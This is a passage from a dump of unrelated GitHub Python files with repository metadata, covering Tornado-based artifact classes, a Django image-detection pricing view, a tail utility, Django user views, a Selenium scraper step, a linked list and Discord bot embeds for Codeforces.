absolute_import\nfrom __future__ import print_function\n\nimport logging\n\nfrom tornado import concurrent\nfrom tornado import gen\n\nfrom flowz import channels\n\n\nclass AbstractArtifact(object):\n \"\"\"\n An object that wraps the details for asynchronous access to an artifact.\n \"\"\"\n\n logger = logging.getLogger(__name__)\n name = None\n\n __exists__ = False\n __ensure__ = None\n __get__ = None\n\n def __init__(self, logger=None, name=None):\n if logger:\n self.logger = logger\n if not name:\n self._as_string = type(self).__name__\n else:\n self._as_string = '%s<%s>' % (type(self).__name__, name)\n self.name = name\n\n def __str__(self):\n return self._as_string\n\n def exists(self):\n \"\"\"\n Returns True if the artifact already exists; False otherwise.\n \"\"\"\n return self.__exists__\n\n def ensure(self):\n \"\"\"\n Returns a Future that will have result True when the artifact's existence is assured.\n \"\"\"\n if self.__ensure__ is None:\n self.logger.debug(\"%s 
starting ensure\" % str(self))\n self.__ensure__ = self.__start_ensure__()\n return self.__ensure__\n\n @gen.coroutine\n def __start_ensure__(self):\n \"\"\"\n Invoked once to start the asynchronous 'ensure' action.\n \"\"\"\n yield self.get()\n raise gen.Return(True)\n\n def get(self):\n \"\"\"\n Returns a Future the result of which will be the artifact itself.\n \"\"\"\n if self.__get__ is None:\n self.logger.debug(\"%s starting get\" % str(self))\n self.__get__ = self.__start_get__()\n return self.__get__\n\n @gen.coroutine\n def __start_get__(self):\n self.__exists__ = True\n raise gen.Return(self)\n\n def as_channel(self):\n \"\"\"\n Returns a channel with `self` as its sole item.\n \"\"\"\n return channels.IterChannel(a for a in (self,))\n\n def value_channel(self):\n \"\"\"\n Returns a channel with self's artifact when it's ready.\n \"\"\"\n return self.as_channel().map(lambda a: a.get()).each_ready()\n\n def ensure_channel(self):\n \"\"\"\n Returns a channel with self's ensure() when it's ready.\n \"\"\"\n return self.as_channel().map(lambda a: a.ensure()).each_ready()\n\n\nclass ExtantArtifact(AbstractArtifact):\n \"\"\"\n An Artifact that is known to exist and asynchronously retrievable.\n \"\"\"\n\n __exists__ = True\n\n def __init__(self, getter, logger=None, name=None):\n \"\"\"\n Create an artifact that is known to exist and asynchronously retrievable.\n\n @param getter: An asynchronous coroutine to get the value\n \"\"\"\n super(ExtantArtifact, self).__init__(logger=logger, name=name)\n self.getter = getter\n\n @gen.coroutine\n def __start_ensure__(self):\n # It is known to exist, so there's nothing to ensure.\n raise gen.Return(True)\n\n @gen.coroutine\n def __start_get__(self):\n try:\n result = yield self.getter()\n except:\n self.logger.exception(\"%s getter failure.\" % str(self))\n raise\n self.logger.debug(\"%s retrieved.\" % str(self))\n raise gen.Return(result)\n\n\nclass DerivedArtifact(AbstractArtifact):\n \"\"\"\n An Artifact that needs to be derived from some sources.\n \"\"\"\n\n def __init__(self, deriver, *sources, **kw):\n \"\"\"\n Create an artifact that needs to be derived from some sources.\n\n @param deriver: a synchronous function to derive the value\n @param sources: zero or more sources that can be synchronous or asychronous\n \"\"\"\n super(DerivedArtifact, self).__init__(\n kw.get('logger'), kw.get('name'))\n self.sources = sources\n self.deriver = deriver\n\n @gen.coroutine\n def __start_get__(self):\n self.logger.debug(\"%s waiting on sources.\" % str(self))\n sources = yield [maybe_artifact(source) for source in self.sources]\n self.logger.debug(\"%s running deriver.\" % str(self))\n yield gen.moment\n try:\n result = self.deriver(*sources)\n except:\n self.logger.exception(\"%s deriver failure.\" % str(self))\n raise\n self.__exists__ = True\n self.logger.debug(\"%s ready.\" % str(self))\n self.sources = None\n self.deriver = None\n raise gen.Return(result)\n\n\nclass ThreadedDerivedArtifact(DerivedArtifact):\n \"\"\"\n A DerivedArtifact that does its derivation on a thread pool executor\n \"\"\"\n\n def __init__(self, executor, deriver, *sources, **kw):\n \"\"\"\n Create an artifact that does its derivation on a thread pool executor\n @param executor: the thread pool executor on which to run\n @param deriver: a synchronous function to derive the value\n @param sources: zero or more sources that can be synchronous or asychronous\n \"\"\"\n super(ThreadedDerivedArtifact, self).__init__(deriver, *sources, **kw)\n self.logger.debug(\"%s created 
(%s).\" % (str(self), self.name))\n self.executor = executor\n\n @concurrent.run_on_executor\n def __derive__(self, *sources):\n self.logger.debug(\"%s running deriver on executor.\" % str(self))\n try:\n return self.deriver(*sources)\n except:\n self.logger.exception(\"%s deriver failure.\" % str(self))\n raise\n\n @gen.coroutine\n def __start_get__(self):\n self.logger.debug(\"%s waiting on sources.\" % str(self))\n sources = yield [maybe_artifact(source) for source in self.sources]\n result = yield self.__derive__(*sources)\n self.__exists__ = True\n self.logger.debug(\"%s ready.\" % str(self))\n self.sources = None\n self.deriver = None\n raise gen.Return(result)\n\n\nclass WrappedArtifact(AbstractArtifact):\n \"\"\"\n An artifact that wraps another artifact (the \"value\"), passing through most\n calls to it.\n\n This class is effectively abstract, since it provides little value when directly used.\n \"\"\"\n\n def __init__(self, value, logger=None, name=None):\n \"\"\"\n Create an artifact that wraps another artifact (the \"value\"), passing through most\n calls to it.\n\n @param value: another artifact\n \"\"\"\n super(WrappedArtifact, self).__init__(logger=logger, name=name)\n self.value = value\n\n def exists(self):\n return self.value.exists()\n\n def ensure(self):\n return self.value.ensure()\n\n def __getattr__(self, attr):\n # NOTE: The text below used to be...\n # if hasattr(self, 'value'):\n # ...but that breaks under Python 3, which seems to immediately call __getattr__ again.\n if 'value' in self.__dict__:\n return getattr(self.value, attr)\n else:\n raise AttributeError(\"No such attribute: %r; value not yet initialized\" % attr)\n\n def __getitem__(self, item):\n try:\n return self.value[item]\n except KeyError:\n # Want the KeyError to originate here.\n raise KeyError(\"No such key: %s\" % repr(item))\n\n @gen.coroutine\n def __start_get__(self):\n value = yield maybe_artifact(self.value)\n raise gen.Return(value)\n\n\nclass TransformedArtifact(WrappedArtifact):\n \"\"\"\n A WrappedArtifact that transforms the value of the wrapped artifact\n \"\"\"\n\n def __init__(self, value, transformer=lambda x: x, logger=None, name=None):\n \"\"\"\n Create an artifact that transforms the value of its wrapped artifact.\n\n @param value: another artifact\n @param transformer: a synchronous function\n \"\"\"\n super(TransformedArtifact, self).__init__(value, logger=logger, name=name)\n self.transformer = transformer\n\n @gen.coroutine\n def __start_get__(self):\n value = yield maybe_artifact(self.value)\n yield gen.moment\n try:\n value = self.transformer(value)\n except:\n self.logger.exception(\"%s transformer failure.\" % str(self))\n raise\n raise gen.Return(value)\n\n\ndef maybe_artifact(value):\n # Still duck typing for \"artifacts\", for now\n if hasattr(value, 'get') and hasattr(value, 'exists') and hasattr(value, 'ensure'):\n return value.get()\n return gen.maybe_future(value)\n\n\nclass KeyedArtifact(WrappedArtifact):\n \"\"\"\n A WrappedArtifact that knows the key of its original artifact,\n even before the original artifact has been resolved.\n\n * `key`: the logical key (often a single point from a quantized\n logical or observational time dimension) for identifying this\n item in a sequence, for cogrouping operations, etc. Its meaning\n and structure is domain-specific. The key must not change\n during the lifetime of the artifact.\n\n * `original`: the wrapped artifact.\n\n All attributes can be accessed both as normal attributes and as\n dictionary keys. 
Thus `item.key is item[\"key\"]` and so on.\n\n Additionally, `item[0]` will give you the key and `item[1]` will give\n the item itself, and `iter(item)` will give you the sequence\n `(item.key, item)`.\n\n This allows `KeyedArtifact` instances to be used as if they were key,value\n pairs, directly, for things like cogrouping.\n \"\"\"\n\n def __init__(self, key, value, logger=None, name=None):\n super(KeyedArtifact, self).__init__(value, logger=logger, name=name)\n self.key = key\n\n def __getitem__(self, idx):\n if idx == 0:\n return self.key\n elif idx == 1:\n return self\n try:\n return getattr(self, idx)\n except AttributeError:\n raise KeyError(\"No such key: %s\" % repr(idx))\n\n def __iter__(self):\n return iter((self.key, self))\n\n def transform(self, func, *params, **kw):\n \"\"\"\n Create a KeyedArtifact that transforms the value of this artifact, but preserves\n the same key.\n\n @param func: a synchronous function\n @param params: the initial parameter to func, to which this artifacts value will be appended\n \"\"\"\n params += (self.value,)\n return KeyedArtifact(self.key, DerivedArtifact(func, *params, **kw))\n\n def threaded_transform(self, executor, func, *params, **kw):\n \"\"\"\n Create a KeyedArtifact that transforms the value of this artifact, but preserves\n the same key. The transformation will run on a separate thread.\n\n @param executor: the thread pool executor\n @param func: a synchronous function\n @param params: the initial parameter to func, to which this artifacts value will be appended\n \"\"\"\n params += (self.value,)\n return KeyedArtifact(self.key, ThreadedDerivedArtifact(executor, func, *params, **kw))\n","repo_name":"ethanrowe/flowz","sub_path":"flowz/artifacts.py","file_name":"artifacts.py","file_ext":"py","file_size_in_byte":10883,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"70184691068","text":"# Import module \nfrom tkinter import *\n\nfrom PIL import ImageTk, Image\n\nroot = Tk()\n# Adjust size \nroot.geometry(\"800x600\") \n\n# Add image file \ncanv = Canvas(root, width=800, height=600, bg='white')\ncanv.grid(row=2, column=3)\n\nimage1 = Image.open(\"bg.png\")\nimage1 = image1.resize((600, 450), Image.ANTIALIAS)\n\ntest = ImageTk.PhotoImage(image1)\ncanv.create_image(0, 0, anchor=NW, image=test)\n\n\nlabel1 = Label( root,text='lower left') \nlabel1.place(x = 100, y = 0) \n\n# Execute tkinter \nroot.mainloop() \n","repo_name":"danmirror/gui-python-simple","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"22728688394","text":"import os , sys , re , base64 , json\nfrom django.shortcuts import render_to_response , render\nfrom django.views.generic import TemplateView\nfrom imageai.Detection import ObjectDetection\n# from django.utils import simplejson\nfrom datetime import datetime\n\nexecution_path = os.getcwd()\n\ndef base64ToFilePath(base64Str , basePath = \"./home/libs/input/\"):\n img_data = bytes(base64Str, 'utf-8')\n fileName = datetime.today().strftime('%Y-%m-%d-%H:%M:%S') + \".png\"\n filePath = basePath + fileName\n with open(os.path.join(execution_path ,filePath ), \"wb\") as fh:\n fh.write(base64.decodebytes(img_data))\n return fileName\n\ndef filePathToBase64(filePath):\n base64Str = ''\n with open(os.path.join(execution_path ,filePath ), \"rb\") as image_file:\n base64Str = base64.b64encode(image_file.read())\n return 
'data:image/png;base64,' + base64Str.decode(\"utf-8\") \n\nprices = {\n 'bottle' : 10,\n 'apple' : 15,\n 'orange' : 15,\n 'sandwich' : 20,\n 'hot dog' : 25,\n 'pizza' : 200,\n 'donut' : 40,\n 'cake' : 120\n}\n\ndef processImage(input_file,output_file) :\n os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n execution_path = os.getcwd()\n\n detector = ObjectDetection()\n detector.setModelTypeAsYOLOv3()\n detector.setModelPath( os.path.join(execution_path , \"./home/libs/yolo.h5\"))\n detector.loadModel()\n\n custom_objects = detector.CustomObjects(bottle=True, apple=True, orange=True, sandwich=True, hot_dog=True, pizza=True, donut=True, cake=True)\n detections = detector.detectCustomObjectsFromImage(custom_objects=custom_objects, input_image=os.path.join(execution_path , input_file), output_image_path=os.path.join(execution_path , output_file), minimum_percentage_probability=30)\n\n totalPrice = 0\n items = []\n for eachObject in detections:\n name = eachObject[\"name\"]\n totalPrice = totalPrice + prices[name]\n items.append([ name , prices[name] ])\n # print(eachObject[\"name\"] , \" : \", eachObject[\"percentage_probability\"], \" : \", eachObject[\"box_points\"] , \" : \" , prices[eachObject[\"name\"]] , \" Baht\" )\n return ( totalPrice , items )\n\n# result = processImage(sys.argv[1],sys.argv[2]) \n# print(\"result totalPrice\",result[0])\n\nclass HomePageView(TemplateView):\n def get(self, request, **kwargs):\n return render(request, 'index.html', context=None)\n def post(self, request, **kwargs):\n image = request.POST['image']\n image = re.sub('^data:image\\/[a-z]+;base64,','', image)\n inputPath = \"./home/libs/input/\"\n outputPath = \"./home/libs/output/\"\n fileName = base64ToFilePath(image)\n result = processImage(inputPath + fileName , outputPath + fileName )\n base64Str = filePathToBase64(outputPath + fileName)\n print(json.dumps(result[1], separators=(',', ':')))\n # return render(request, 'index.html', { 'image' : base64Str , 'items' : result[1]}) \n return render(request, 'index.html', { 'image' : base64Str , 'items' : json.dumps(result[1])}) \n","repo_name":"sawatdee/AI-image-processing","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"988686806","text":"#!/usr/bin/env python3\nfrom os import path\nfrom itertools import chain\nfrom contextlib import suppress \nfrom argparse import ArgumentParser \nfrom tail import read_last_lines, follow_lines\n\n\ndef init_argparse() -> ArgumentParser:\n parser = ArgumentParser(\n usage=\"tail [-f] [-n number] [FILE]\",\n description=\"The tail utility displays the contents of file to the standard output.\"\n )\n parser.add_argument(\"-f\", \"--follow\", action=\"store_true\", default=False)\n parser.add_argument(\"-n\", \"--number\", type=int, default=10)\n parser.add_argument(\"FILE\", nargs=1, type=readable_file(parser))\n return parser\n\n\ndef readable_file(parser: ArgumentParser):\n def inner(filename: str) -> str:\n if not path.exists(filename):\n parser.error(f\"File is not readable: {filename}\")\n return filename\n return inner\n\n\ndef tail(filename: str, lines: int, follow: bool):\n with open(filename, \"r\") as fh:\n lines = read_last_lines(fh, lines)\n if follow:\n lines = chain(lines, follow_lines(fh))\n \n with suppress(KeyboardInterrupt):\n for line in lines:\n print(line, end=\"\")\n\n\ndef main():\n parser = init_argparse()\n args = parser.parse_args()\n tail(\n 
filename=next(iter(args.FILE)), \n lines=args.number, \n follow=args.follow\n )\n \n\nif __name__ == '__main__':\n main()\n","repo_name":"0eu/tail-assignment","sub_path":"tail.py","file_name":"tail.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"72510040189","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages \nfrom django.contrib.auth.decorators import login_required\nfrom .forms import UserRegisterForm, UserUpdateForm, ProfileUpdateForm, ExampleForm\nfrom django.contrib.auth import user_logged_in\nfrom main.models import Post, PostImage\nfrom .models import Profile\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .api.serializers import ProfileSerializer\nfrom django.http import JsonResponse\n\n\n# Create your views here.\ndef logged_in_message(sender, user, request, **kwargs):\n \"\"\"\n Add a welcome message when the user logs in\n \"\"\"\n messages.info(request, f'Welcome {user.username}!')\n\nuser_logged_in.connect(logged_in_message)\ndef register(request):\n if request.method == 'POST':\n form = UserRegisterForm(request.POST) # get data from register form and clean it\n if form.is_valid():\n form.save()#\n messages.success(request, f'Your account has been created! Now you can log in')\n return redirect('login')\n else :\n form = UserRegisterForm()\n return render(request, 'users/register.html', {'form': form, 'title': 'Register'})\n\n@login_required\ndef profile(request):\n author_id = request.user.id\n posts = Post.objects.filter(author=author_id)\n context = {\n 'posts': posts,\n 'title': 'Profile page',\n }\n return render(request, 'users/profile.html', context)\n\n@login_required\ndef profile_update(request):\n e_form = ExampleForm()\n if request.method == 'POST':\n u_form = UserUpdateForm(request.POST, instance=request.user)\n p_form = ProfileUpdateForm(request.POST, request.FILES, instance=request.user.profile)\n if 'cancel' in request.POST:\n return redirect('profile')\n if u_form.is_valid() and p_form.is_valid():\n u_form.save()#\n p_form.save()#\n messages.success(request, f'Your account has been updated!')\n return redirect('profile')\n else :\n u_form = UserUpdateForm(instance=request.user)\n p_form = ProfileUpdateForm(instance=request.user.profile)\n\n context = {\n 'u_form': u_form,\n 'p_form': p_form,\n 'e_form': e_form,\n 'title': 'Profile page',\n }\n return render(request, 'users/profile-update.html', context)\n\n@login_required\ndef my_posts(request):\n author_id = request.user.id\n posts = Post.objects.filter(author=author_id)\n context = {\n 'posts': posts,\n 'title': 'Profile page',\n }\n return render(request, 'users/my-posts.html', context)\n\n@csrf_exempt\ndef get_user_profile_image(request, id):\n profile = Profile.objects.get(user=id)\n serializer = ProfileSerializer(profile).data\n return JsonResponse(serializer, safe=False)\n\ndef delete_profile_image(request, id):\n print(\"Delete profile image\")\n print(request)\n return","repo_name":"userksv/carsbay","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"71364618748","text":"from scrapy_balloons.selenium_api import SeleniumApi as slm\nfrom scrapy_balloons.selenium_api import *\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom 
selenium.webdriver.support import expected_conditions as EC\nclass jer_online:\n\n\n\n    @classmethod\n    def click_and_get_response(cls, url, **kwargs):\n        # Note: the website needs to run in the USA to get a good result\n        \"\"\"\n        url -- type is str\n        return list of SeleniumResponse\n        \"\"\"\n        try:\n            from scrapy_balloons.spiders.balloon import config\n            from scrapy_balloons.selenium_api import slm_config, driver, balloon_spider\n            slm_response = SeleniumResponse(kwargs.get('request'))\n            slmStep = SlmStep(slm_config['click'])\n\n            driver.get(url)\n            time.sleep(slmStep.sleep)\n\n            slm.find_element(xpath=\"//select[@id='ddlFOS']/option[@value='1']\").click()\n            time.sleep(slmStep.sleep)\n\n            slm.find_element(xpath=\"//select[@id='ddlCategory']/option[@value='1']\").click()\n            time.sleep(slmStep.sleep)\n\n            slm.find_element(id='btnSearch2').click()\n            time.sleep(slmStep.sleep)\n\n            WebDriverWait(driver, 120).until(EC.invisibility_of_element_located((By.XPATH, \"//div[@id='UpdateProgress1']\")))\n\n            time.sleep(slmStep.sleep)\n            slm_response.add_html_res(url, driver.page_source.encode('utf-8'))\n        except Exception:\n            pass\n        return slm_response.get_html_res()\n","repo_name":"hoangminhitvn/scraper","sub_path":"scraper-framework/scrapy_balloons/supportclients/jer_online.py","file_name":"jer_online.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"34294744272","text":"class node:\n    def __init__(self,data):\n        self.data=data\n        self.next=None\n        self.prev=None\n\nclass dll:\n    def __init__(self):\n        self.head=None\n    def addNodeBeforeValue(self,givenValue,newValue):\n        if self.head==None:\n            return\n        if self.head.data==givenValue:\n            newnode=node(newValue)\n            newnode.next=self.head\n            self.head.prev=newnode\n            self.head=newnode\n        else:\n            curr=self.head\n            prev=None\n            while curr is not None and curr.data!=givenValue:\n                prev=curr\n                curr=curr.next\n            if curr is None:\n                # givenValue is not in the list; nothing to insert before\n                return\n            newnode=node(newValue)\n            prev.next=newnode\n            newnode.prev=prev\n            newnode.next=curr\n            curr.prev=newnode\n    ","repo_name":"farhan1503001/Data-Structures-203-IUB","sub_path":"Doubly Linked List/addBeforeValue.py","file_name":"addBeforeValue.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"9414280599","text":"\"\"\"\nContains functions related to Discord-specific features, such as embeds.\n\"\"\"\n\n\nimport discord\nimport datetime\nimport time\n\nfrom botforces.utils.constants import (\n    NUMBER_OF_ACS,\n    USER_WEBSITE_URL,\n    PROBLEM_WEBSITE_URL,\n)\nfrom botforces.utils.services import enclose_tags_in_spoilers\n\n\n\"\"\"\nUser embeds.\n\"\"\"\n\n\nasync def create_user_embed(user, author, color):\n    \"\"\"\n    Creates an embed with user information.\n    \"\"\"\n\n    Embed = discord.Embed(\n        title=user[\"handle\"],\n        url=f\"{USER_WEBSITE_URL}{user['handle']}\",\n        color=color,\n    )\n\n    Embed.set_thumbnail(url=user[\"avatar\"])\n\n    if \"firstName\" in user and \"lastName\" in user:\n        Embed.add_field(\n            name=\"Name\",\n            value=f\"{user['firstName']} {user['lastName']}\",\n            inline=False,\n        )\n\n    if \"city\" in user and \"country\" in user:\n        Embed.add_field(\n            name=\"City\",\n            value=f\"{user['city']}, {user['country']}\",\n            inline=False,\n        )\n\n    if \"rank\" in user:\n        Embed.add_field(\n            name=\"Rank\",\n            value=user[\"rank\"].title(),\n            inline=False,\n        )\n    else:\n        Embed.add_field(name=\"Rank\", value=\"Unranked\", inline=False)\n\n    if \"rating\" in user:\n        Embed.add_field(\n            name=\"Rating\",\n            value=user[\"rating\"],\n            inline=False,\n        )\n\n    
Embed.set_footer(icon_url=author.avatar_url, text=str(author))\n\n return Embed\n\n\n\"\"\"\nProblem embeds.\n\"\"\"\n\n\nasync def create_problem_embed(problem, author):\n \"\"\"\n Creates an embed with problem information.\n \"\"\"\n\n Embed = discord.Embed(\n title=f\"{problem['contestId']}{problem['contestIndex']}. {problem['name']}\",\n url=f\"{PROBLEM_WEBSITE_URL}{problem['contestId']}/{problem['contestIndex']}\",\n color=0xFF0000,\n )\n\n Embed.add_field(name=\"Rating\", value=problem[4], inline=False)\n\n # Printing the tags in spoilers\n if problem[\"tags\"] != \"[]\":\n tags = await enclose_tags_in_spoilers(problem[\"tags\"])\n Embed.add_field(name=\"Tags\", value=tags)\n\n Embed.set_footer(icon_url=author.avatar_url, text=str(author))\n\n return Embed\n\n\n\"\"\"\nUpcoming contests embeds.\n\"\"\"\n\n\nasync def create_contest_embed(contestList, author):\n \"\"\"\n Creates an embed with contest information.\n \"\"\"\n\n Embed = discord.Embed(title=\"List of upcoming contests\", color=0xFF0000)\n\n # Adding each contest as a field to the embed\n for contest in contestList:\n\n # Obtaining the start time of the contest\n date = datetime.datetime.fromtimestamp(contest[\"startTimeSeconds\"])\n dateString = date.strftime(\"%b %d, %Y, %H:%M\")\n\n # Obtaining contest duration\n duration = datetime.timedelta(seconds=contest[\"durationSeconds\"])\n hours = duration.seconds // 3600\n minutes = (duration.seconds // 60) % 60\n\n Embed.add_field(\n name=contest[\"name\"],\n value=f\"{contest['id']} - {dateString} {time.tzname[0]} - {hours} hrs, {minutes} mins\",\n inline=False,\n )\n\n Embed.set_footer(icon_url=author.avatar_url, text=str(author))\n\n return Embed\n\n\n\"\"\"\nStalk embeds.\n\"\"\"\n\n\nasync def create_submissions_embed(submissions, count, handle, author):\n \"\"\"\n Creates an embed with information about a user's last n solved problems.\n \"\"\"\n\n Embed = discord.Embed(\n title=f\"Last {count} solved by {handle}\",\n description=submissions,\n color=0xFF0000,\n )\n\n Embed.set_footer(icon_url=author.avatar_url, text=str(author))\n\n return Embed\n\n\n\"\"\"\nGraph embeds.\n\"\"\"\n\n\nasync def create_rating_plot_embed(handle, author):\n \"\"\"\n Creates an embed with the rating plot of a user.\n \"\"\"\n\n Embed = discord.Embed(\n title=f\"{handle}'s solved problems\",\n description=\"Note: ? 
refers to problems that do not have a rating on Codeforces.\",\n color=0xFF0000,\n )\n Embed.set_image(url=\"attachment://figure.png\")\n Embed.set_footer(icon_url=author.avatar_url, text=str(author))\n\n return Embed\n\n\nasync def create_index_plot_embed(handle, author):\n \"\"\"\n Creates an embed with the index plot of a user.\n \"\"\"\n\n Embed = discord.Embed(title=f\"{handle}'s solved problems\", color=0xFF0000)\n Embed.set_image(url=\"attachment://figure.png\")\n Embed.set_footer(icon_url=author.avatar_url, text=str(author))\n\n return Embed\n\n\nasync def create_tags_plot_embed(handle, author):\n \"\"\"\n Creates an embed with the tags plot of a user.\n \"\"\"\n\n Embed = discord.Embed(title=f\"{handle}'s solved problems\", color=0xFF0000)\n Embed.set_image(url=\"attachment://figure.png\")\n Embed.set_footer(icon_url=author.avatar_url, text=str(author))\n\n return Embed\n\n\n\"\"\"\nHelp embeds.\n\"\"\"\n\n\nasync def create_general_help_embed(author):\n \"\"\"\n Displays an embed with instructions on how to use all commands.\n \"\"\"\n\n Embed = discord.Embed(\n title=\"Help Menu\",\n description=\"Type `-help command` to learn about a specific command.\",\n color=0xFF0000,\n )\n\n Embed.add_field(\n name=\"user\", value=\"Displays information about a user.\", inline=False\n )\n Embed.add_field(\n name=\"register\",\n value=\"Stores a mapping between Discord account and Codeforces handle.\",\n inline=False,\n )\n Embed.add_field(\n name=\"unregister\",\n value=\"Removes a mapping between Discord account and Codeforces handle.\",\n inline=False,\n )\n Embed.add_field(\n name=\"stalk\",\n value=\"Displays the last n problems solved by a user.\",\n inline=False,\n )\n Embed.add_field(\n name=\"problem\",\n value=\"Displays a random problem (unsolved by the user if registered).\",\n inline=False,\n )\n Embed.add_field(\n name=\"upcoming\",\n value=\"Displays the list of upcoming Codeforces contests.\",\n inline=False,\n )\n Embed.add_field(\n name=\"duel\",\n value=\"Challenges another user to a duel over a problem.\",\n inline=False,\n )\n Embed.add_field(\n name=\"plotrating\",\n value=\"Plots the problems done by a user, grouped by rating.\",\n inline=False,\n )\n Embed.add_field(\n name=\"plotindex\",\n value=\"Plots the problems done by a user, grouped by contest index.\",\n inline=False,\n )\n Embed.add_field(\n name=\"plottags\",\n value=\"Plots the problems done by a user, grouped by tags.\",\n inline=False,\n )\n\n Embed.set_footer(icon_url=author.avatar_url, text=str(author))\n\n return Embed\n\n\nasync def create_user_help_embed(author):\n \"\"\"\n Displays an embed with instructions on how to use the user command.\n \"\"\"\n\n Embed = discord.Embed(\n title=\"user\", description=\"Displays information about a user.\", color=0xFF0000\n )\n Embed.add_field(name=\"Syntax\", value=\"`-user `\", inline=False)\n Embed.set_footer(icon_url=author.avatar_url, text=str(author))\n\n return Embed\n\n\nasync def create_register_help_embed(author):\n \"\"\"\n Displays an embed with instructions on how to use the register command.\n \"\"\"\n\n Embed = discord.Embed(\n title=\"register\",\n description=\"Stores a mapping between Discord account and Codeforces handle. 
The Discord account is the one that sent the message.\",\n color=0xFF0000,\n )\n Embed.add_field(\n name=\"Syntax\", value=\"`-register `\", inline=False\n )\n Embed.set_footer(icon_url=author.avatar_url, text=str(author))\n\n return Embed\n\n\nasync def create_unregister_help_embed(author):\n \"\"\"\n Displays an embed with instructions on how to use the unregister command.\n \"\"\"\n\n Embed = discord.Embed(\n title=\"unregister\",\n description=\"Removes a mapping between Discord account and Codeforces handle. The Discord account is the one that sent the message.\",\n color=0xFF0000,\n )\n Embed.add_field(name=\"Syntax\", value=\"`-unregister`\", inline=False)\n Embed.set_footer(icon_url=author.avatar_url, text=str(author))\n\n return Embed\n\n\nasync def create_stalk_help_embed(author):\n \"\"\"\n Displays an embed with instructions on how to use the stalk command.\n \"\"\"\n\n Embed = discord.Embed(\n title=\"stalk\",\n description=f\"Displays the last n problems solved by a user ({NUMBER_OF_ACS} by default).\",\n color=0xFF0000,\n )\n Embed.add_field(\n name=\"Syntax\",\n value=f\"`-stalk ` - Displays last {NUMBER_OF_ACS} submissions of the user\\n`-stalk ` - Displays last n submissions of the user\",\n )\n Embed.set_footer(icon_url=author.avatar_url, text=str(author))\n\n return Embed\n\n\nasync def create_problem_help_embed(author):\n \"\"\"\n Displays an embed with instructions on how to use the problem command.\n \"\"\"\n\n Embed = discord.Embed(\n title=\"problem\",\n description=\"Displays a random problem of optional rating and/or tags (unsolved by the user if registered).\",\n color=0xFF0000,\n )\n Embed.add_field(\n name=\"Syntax\",\n value='`-problem` - Displays a random problem.\\n`-problem ` - Displays a random problem of that rating.\\n`-problem ` - Displays a random problem of those tags (multiple tags are allowed).\\n`-problem ` - Displays a random problem of those tags and rating (order does not matter).\\n\\nNote: For tags like \"binary search\", enclose the tag in double quotes.',\n inline=False,\n )\n Embed.set_footer(icon_url=author.avatar_url, text=str(author))\n\n return Embed\n\n\nasync def create_upcoming_help_embed(author):\n \"\"\"\n Displays an embed with instructions on how to use the upcoming command.\n \"\"\"\n\n Embed = discord.Embed(\n title=\"upcoming\",\n description=\"Displays information about upcoming contests.\",\n color=0xFF0000,\n )\n Embed.add_field(name=\"Syntax\", value=\"`-upcoming`\", inline=False)\n Embed.set_footer(icon_url=author.avatar_url, text=str(author))\n\n return Embed\n\n\nasync def create_duel_help_embed(author):\n \"\"\"\n Displays an embed with instructions on how to use the duel command.\n \"\"\"\n\n Embed = discord.Embed(\n title=\"duel\",\n description=\"Challenges another user to a duel over a problem.\",\n color=0xFF0000,\n )\n Embed.add_field(\n name=\"Syntax\",\n value=\"`-duel @ ` - To challenge a user\\n`-endduel` - To end a duel and decide the result (only if a duel is in progress).\",\n inline=False,\n )\n Embed.set_footer(icon_url=author.avatar_url, text=str(author))\n\n return Embed\n\n\nasync def create_plotrating_help_embed(author):\n \"\"\"\n Displays an embed with instructions on how to use the plotrating command.\n \"\"\"\n\n Embed = discord.Embed(\n title=\"plotrating\",\n description=\"Plots the problems done by a user, grouped by rating.\",\n color=0xFF0000,\n )\n Embed.add_field(\n name=\"Syntax\", value=\"`-plotrating `\", inline=False\n )\n Embed.set_footer(icon_url=author.avatar_url, 
text=str(author))\n\n    return Embed\n\n\nasync def create_plotindex_help_embed(author):\n    \"\"\"\n    Displays an embed with instructions on how to use the plotindex command.\n    \"\"\"\n\n    Embed = discord.Embed(\n        title=\"plotindex\",\n        description=\"Plots the problems done by a user, grouped by contest index.\",\n        color=0xFF0000,\n    )\n    Embed.add_field(\n        name=\"Syntax\", value=\"`-plotindex `\", inline=False\n    )\n    Embed.set_footer(icon_url=author.avatar_url, text=str(author))\n\n    return Embed\n\n\nasync def create_plottags_help_embed(author):\n    \"\"\"\n    Displays an embed with instructions on how to use the plottags command.\n    \"\"\"\n\n    Embed = discord.Embed(\n        title=\"plottags\",\n        description=\"Plots the problems done by a user, grouped by tags.\",\n        color=0xFF0000,\n    )\n    Embed.add_field(\n        name=\"Syntax\", value=\"`-plottags `\", inline=False\n    )\n    Embed.set_footer(icon_url=author.avatar_url, text=str(author))\n\n    return Embed\n\n\n\"\"\"\nDuel embeds.\n\"\"\"\n\n\nasync def create_duel_begin_embed(problem, author, opponent):\n    \"\"\"\n    Displays an embed with information about the duel.\n    \"\"\"\n\n    Embed = discord.Embed(\n        title=f\"{problem['contestId']}{problem['contestIndex']}. {problem['name']}\",\n        url=f\"{PROBLEM_WEBSITE_URL}{problem['contestId']}/{problem['contestIndex']}\",\n        description=\"The duel starts now!\",\n        color=0xFF0000,\n    )\n\n    Embed.add_field(name=\"Rating\", value=problem[\"rating\"], inline=False)\n\n    # Printing the tags in 